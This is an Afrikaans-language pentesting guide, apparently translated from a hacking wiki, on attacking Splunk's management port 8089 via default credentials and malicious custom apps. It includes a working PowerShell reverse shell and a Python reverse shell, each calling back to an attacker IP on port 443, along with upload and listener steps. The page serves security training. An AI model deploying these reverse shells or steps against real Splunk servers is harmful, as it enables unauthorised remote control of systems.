8089 - Pentesting Splunkd

Reading time: 4 minutes

Basiese Inligting

• Log analitiese hulpmiddel wat gebruik word vir data insameling, analise, en visualisering
• Gewoonlik gebruik in sekuriteitsmonitering en besigheidsanalise
• Standaard poorte:
• Webbediener: 8000
• Splunkd diens: 8089

Kwetsbaarheid Vektore:

1. Gratis Weergawe Exploitatie

• Proefweergawe omskakel outomaties na gratis weergawe na 60 dae
• Gratis weergawe ontbreek outentisering
• Potensiële sekuriteitsrisiko as dit onbeheerd gelaat word
• Administrateurs mag sekuriteitsimplikasies oor die hoof sien

2. Kredensiaal Swakhede

• Ou weergawe: Standaard kredensiale admin:changeme
• Nuwe weergawes: Kredensiale ingestel tydens installasie
• Potensiaal vir swak wagwoord gebruik (bv. admin, Welcome, Password123)

3. Afgeleë Kode Uitvoering Geleenthede

• Meerdere kode uitvoeringsmetodes:
• Bediener-kant Django toepassings
• REST eindpunte
• Geskrewe insette
• Waarskuwingskripte
• Kruis-platform ondersteuning (Windows/Linux)
• Geskrewe insette kan loop:
• Bash skripte
• PowerShell skripte
• Batch skripte

Sleutel Exploitatie Potensiaal:

• Sensitiewe data stoor
• Gebrek aan outentisering in gratis weergawe
• Meerdere vektore vir potensiële afgeleë kode uitvoering
• Moontlikheid om geskrewe insette te benut vir stelselskompromie

Shodan

• Splunk build

RCE

Skep Aangepaste Toepassing

Splunk bied 'n gesofistikeerde metode vir afgeleë kode uitvoering deur middel van aangepaste toepassingsontplooiing, wat sy kruis-platform skripting vermoëns benut. Die kern exploitatie tegniek draai om die skep van 'n kwaadwillige toepassing wat omgekeerde skale op beide Windows en Linux stelsels kan uitvoer.

'n Aangepaste toepassing kan Python, Batch, Bash, of PowerShell skripte uitvoer. Boonop, Splunk kom met Python geïnstalleer, so selfs in Windows stelsels sal jy in staat wees om python kode uit te voer.

Jy kan hierdie voorbeeld gebruik met die bin wat 'n voorbeeld bevat vir Python en PowerShell. Of jy kan jou eie skep.

Die exploitatie proses volg 'n konsekwente metodologie oor platforms:

splunk_shell/
├── bin        (reverse shell scripts)
└── default    (inputs.conf configuration)

Die kritieke konfigurasie lêer inputs.conf aktiveer die skrip deur:

• disabled = 0 in te stel
• 'n 10-sekonde uitvoeringsinterval te konfigureer
• Die skrip se brontipe te definieer

Ontplooiing is eenvoudig:

1. Skep die kwaadwillige toepassingspakket
2. Stel 'n luisteraar (Netcat/socat) op die aanvalmasjien op
3. Laai die toepassing op deur Splunk se koppelvlak
4. Trigger outomatiese skripuitvoering by opgelaai

Voorbeeld Windows PowerShell omgekeerde skulp:

$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',443);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush()
};
$client.Close()

Voorbeeld Linux Python omgekeerde dop:

import sys, socket, os, pty
ip = "10.10.14.15"
port = "443"
s = socket.socket()
s.connect((ip, int(port)))
[os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]
pty.spawn('/bin/bash')

RCE & Privilege Escalation

In die volgende bladsy kan jy 'n verduideliking vind oor hoe hierdie diens misbruik kan word om voorregte te verhoog en volharding te verkry:

Splunk LPE and Persistence

References

• https://academy.hackthebox.com/module/113/section/1213